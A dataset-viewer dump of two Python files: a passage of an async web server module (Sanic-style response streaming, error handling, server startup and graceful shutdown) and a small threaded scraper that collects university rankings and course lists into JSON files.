Streams a response to the client asynchronously. Attaches
the transport to the response so the response consumer can
write to the response as needed.
"""
if self._response_timeout_handler:
self._response_timeout_handler.cancel()
self._response_timeout_handler = None
try:
keep_alive = self.keep_alive
response.protocol = self
await response.stream(
self.request.version, keep_alive, self.keep_alive_timeout
)
self.log_response(response)
except AttributeError:
logger.error(
"Invalid response object for url %s, "
"Expected Type: HTTPResponse, Actual Type: %s",
self.url,
type(response),
)
self.write_error(ServerError("Invalid response type"))
except RuntimeError:
if self.app.debug:
logger.error(
"Connection lost before response written @ %s",
self.request.ip,
)
keep_alive = False
except Exception as e:
self.bail_out(f"Writing response failed, connection closed {e!r}")
finally:
if not keep_alive:
self.transport.close()
self.transport = None
else:
self._keep_alive_timeout_handler = self.loop.call_later(
self.keep_alive_timeout, self.keep_alive_timeout_callback
)
self._last_response_time = time()
self.cleanup()
def write_error(self, exception):
# An error _is_ a response.
# Don't throw a response timeout, when a response _is_ given.
if self._response_timeout_handler:
self._response_timeout_handler.cancel()
self._response_timeout_handler = None
response = None
try:
response = self.error_handler.response(self.request, exception)
version = self.request.version if self.request else "1.1"
self.transport.write(response.output(version))
except RuntimeError:
if self.app.debug:
logger.error(
"Connection lost before error written @ %s",
self.request.ip if self.request else "Unknown",
)
except Exception as e:
self.bail_out(
f"Writing error failed, connection closed {e!r}",
from_error=True,
)
finally:
if self.parser and (
self.keep_alive or getattr(response, "status", 0) == 408
):
self.log_response(response)
try:
self.transport.close()
except AttributeError:
logger.debug("Connection lost before server could close it.")
def bail_out(self, message, from_error=False):
"""
In case if the transport pipes are closed and the sanic app encounters
an error while writing data to the transport pipe, we log the error
with proper details.
:param message: Error message to display
:param from_error: If the bail out was invoked while handling an
exception scenario.
:type message: str
:type from_error: bool
:return: None
"""
if from_error or self.transport is None or self.transport.is_closing():
logger.error(
"Transport closed @ %s and exception "
"experienced during error handling",
(
self.transport.get_extra_info("peername")
if self.transport is not None
else "N/A"
),
)
logger.debug("Exception:", exc_info=True)
else:
self.write_error(ServerError(message))
logger.error(message)
def cleanup(self):
"""This is called when KeepAlive feature is used,
it resets the connection in order for it to be able
to handle receiving another request on the same connection."""
self.parser = None
self.request = None
self.url = None
self.headers = None
self._request_handler_task = None
self._request_stream_task = None
self._total_request_size = 0
self._is_stream_handler = False
def close_if_idle(self):
"""Close the connection if a request is not being sent or received
:return: boolean - True if closed, false if staying open
"""
if not self.parser and self.transport is not None:
self.transport.close()
return True
return False
def close(self):
"""
Force close the connection.
"""
if self.transport is not None:
self.transport.close()
self.transport = None
def trigger_events(events, loop):
"""Trigger event callbacks (functions or async)
:param events: one or more sync or async functions to execute
:param loop: event loop
"""
for event in events:
result = event(loop)
if isawaitable(result):
loop.run_until_complete(result)
class AsyncioServer:
"""
Wraps an asyncio server with functionality that might be useful to
a user who needs to manage the server lifecycle manually.
"""
__slots__ = (
"loop",
"serve_coro",
"_after_start",
"_before_stop",
"_after_stop",
"server",
"connections",
)
def __init__(
self,
loop,
serve_coro,
connections,
after_start,
before_stop,
after_stop,
):
# Note, Sanic already called "before_server_start" events
# before this helper was even created. So we don't need it here.
self.loop = loop
self.serve_coro = serve_coro
self._after_start = after_start
self._before_stop = before_stop
self._after_stop = after_stop
self.server = None
self.connections = connections
def after_start(self):
"""Trigger "after_server_start" events"""
trigger_events(self._after_start, self.loop)
def before_stop(self):
"""Trigger "before_server_stop" events"""
trigger_events(self._before_stop, self.loop)
def after_stop(self):
"""Trigger "after_server_stop" events"""
trigger_events(self._after_stop, self.loop)
def is_serving(self):
if self.server:
return self.server.is_serving()
return False
def wait_closed(self):
if self.server:
return self.server.wait_closed()
def close(self):
if self.server:
self.server.close()
coro = self.wait_closed()
task = asyncio.ensure_future(coro, loop=self.loop)
return task
def start_serving(self):
if self.server:
try:
return self.server.start_serving()
except AttributeError:
raise NotImplementedError(
"server.start_serving not available in this version "
"of asyncio or uvloop."
)
def serve_forever(self):
if self.server:
try:
return self.server.serve_forever()
except AttributeError:
raise NotImplementedError(
"server.serve_forever not available in this version "
"of asyncio or uvloop."
)
def __await__(self):
"""Starts the asyncio server, returns AsyncServerCoro"""
task = asyncio.ensure_future(self.serve_coro)
while not task.done():
yield
self.server = task.result()
return self
def serve(
host,
port,
app,
before_start=None,
after_start=None,
before_stop=None,
after_stop=None,
ssl=None,
sock=None,
reuse_port=False,
loop=None,
protocol=HttpProtocol,
backlog=100,
register_sys_signals=True,
run_multiple=False,
run_async=False,
connections=None,
signal=Signal(),
state=None,
asyncio_server_kwargs=None,
):
"""Start asynchronous HTTP Server on an individual process.
:param host: Address to host on
:param port: Port to host on
:param before_start: function to be executed before the server starts
listening. Takes arguments `app` instance and `loop`
:param after_start: function to be executed after the server starts
listening. Takes arguments `app` instance and `loop`
:param before_stop: function to be executed when a stop signal is
received before it is respected. Takes arguments
`app` instance and `loop`
:param after_stop: function to be executed when a stop signal is
received after it is respected. Takes arguments
`app` instance and `loop`
:param ssl: SSLContext
:param sock: Socket for the server to accept connections from
:param reuse_port: `True` for multiple workers
:param loop: asyncio compatible event loop
:param run_async: bool: Do not create a new event loop for the server,
and return an AsyncServer object rather than running it
:param asyncio_server_kwargs: key-value args for asyncio/uvloop
create_server method
:return: Nothing
"""
if not run_async:
# create new event_loop after fork
loop = asyncio.new_event_loop()
asyncio.set_event_loop(loop)
if app.debug:
loop.set_debug(app.debug)
app.asgi = False
connections = connections if connections is not None else set()
server = partial(
protocol,
loop=loop,
connections=connections,
signal=signal,
app=app,
state=state,
)
asyncio_server_kwargs = (
asyncio_server_kwargs if asyncio_server_kwargs else {}
)
server_coroutine = loop.create_server(
server,
host,
port,
ssl=ssl,
reuse_port=reuse_port,
sock=sock,
backlog=backlog,
**asyncio_server_kwargs,
)
if run_async:
return AsyncioServer(
loop=loop,
serve_coro=server_coroutine,
connections=connections,
after_start=after_start,
before_stop=before_stop,
after_stop=after_stop,
)
trigger_events(before_start, loop)
try:
http_server = loop.run_until_complete(server_coroutine)
except BaseException:
logger.exception("Unable to start server")
return
trigger_events(after_start, loop)
# Ignore SIGINT when run_multiple
if run_multiple:
signal_func(SIGINT, SIG_IGN)
# Register signals for graceful termination
if register_sys_signals:
if OS_IS_WINDOWS:
ctrlc_workaround_for_windows(app)
else:
for _signal in [SIGTERM] if run_multiple else [SIGINT, SIGTERM]:
loop.add_signal_handler(_signal, app.stop)
pid = os.getpid()
try:
logger.info("Starting worker [%s]", pid)
loop.run_forever()
finally:
logger.info("Stopping worker [%s]", pid)
# Run the on_stop function if provided
trigger_events(before_stop, loop)
# Wait for event loop to finish and all connections to drain
http_server.close()
loop.run_until_complete(http_server.wait_closed())
# Complete all tasks on the loop
signal.stopped = True
for connection in connections:
connection.close_if_idle()
# Gracefully shutdown timeout.
# We should provide graceful_shutdown_timeout,
# instead of letting connection hangs forever.
# Let's roughly calcucate time.
graceful = app.config.GRACEFUL_SHUTDOWN_TIMEOUT
start_shutdown = 0
while connections and (start_shutdown < graceful):
loop.run_until_complete(asyncio.sleep(0.1))
start_shutdown = start_shutdown + 0.1
# Force close non-idle connection after waiting for
# graceful_shutdown_timeout
coros = []
for conn in connections:
if hasattr(conn, "websocket") and conn.websocket:
coros.append(conn.websocket.close_connection())
else:
conn.close()
_shutdown = asyncio.gather(*coros)
loop.run_until_complete(_shutdown)
trigger_events(after_stop, loop)
loop.close()
def serve_multiple(server_settings, workers):
"""Start multiple server processes simultaneously. Stop on interrupt
and terminate signals, and drain connections when complete.
:param server_settings: kw arguments to be passed to the serve function
:param workers: number of workers to launch
:param stop_event: if provided, is used as a stop signal
:return:
"""
server_settings["reuse_port"] = True
server_settings["run_multiple"] = True
# Handling when custom socket is not provided.
if server_settings.get("sock") is None:
sock = socket()
sock.setsockopt(SOL_SOCKET, SO_REUSEADDR, 1)
sock.bind((server_settings["host"], server_settings["port"]))
sock.set_inheritable(True)
server_settings["sock"] = sock
server_settings["host"] = None
server_settings["port"] = None
processes = []
def sig_handler(signal, frame):
logger.info("Received signal %s. Shutting down.", Signals(signal).name)
for process in processes:
os.kill(process.pid, SIGTERM)
signal_func(SIGINT, lambda s, f: sig_handler(s, f))
signal_func(SIGTERM, lambda s, f: sig_handler(s, f))
mp = multiprocessing.get_context("fork")
for _ in range(workers):
process = mp.Process(target=serve, kwargs=server_settings)
process.daemon = True
process.start()
processes.append(process)
for process in processes:
process.join()
# the above processes will block this until they're stopped
for process in processes:
process.terminate()
server_settings.get("sock").close()
|
scraper.py | from requests import get
from bs4 import BeautifulSoup as BS
import tabulate
from pprint import pprint
import os,json
from threading import Thread
url = 'https://www.timeshighereducation.com/student/best-universities/top-50-universities-reputation-2018#survey-answer'
raw = get(url)
soup = BS(raw.text,'html.parser')
table = soup.find('table')
trs = table.findAll('tr')
universities = []
urls = []
for tr in trs:
if trs.index(tr) != 0:
urls.append(tr.find('a').get('href'))
temp = tr.getText().split('\n')
temp.pop()
universities.append(temp[:])
# print(tabulate.tabulate(universities[1:],headers = universities[0]))
def getCourses(url,num):
print('Thread',num,'Started')
fileName = url[63:] + '.json'
if os.path.exists(fileName):
json_data = open(fileName).read()
data = json.loads(json_data)
print('Thread',num,'Ended')
return data
else:
raw = get(url)
soup = BS(raw.text,'html.parser')
ul = soup.find('ul' , class_ = 'courses-list-group list-group')
if ul != None:
lis = ul.findAll('li')
dic = {}
courseList = []
main_dic = {}
for li in lis:
if li.find('h3') != None:
dic['courseName'] = li.find('h3').getText().strip()
if [x.getText().strip() for x in li.findAll('li')] != []:
dic['subjects'] = [x.getText().strip() for x in li.findAll('li')]
if dic.copy() not in courseList:
courseList.append(dic.copy())
main_dic[url[63:]] = courseList
with open(fileName,'w+') as file:
json.dump(main_dic,file)
print('Thread',num,'Ended')
return main_dic
def allCourses(url_list):
for num,url in enumerate(url_list):
# getCourses(url,num)
thread = Thread(target=getCourses,args = (url,num,))
thread.start()
allCourses(urls)
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.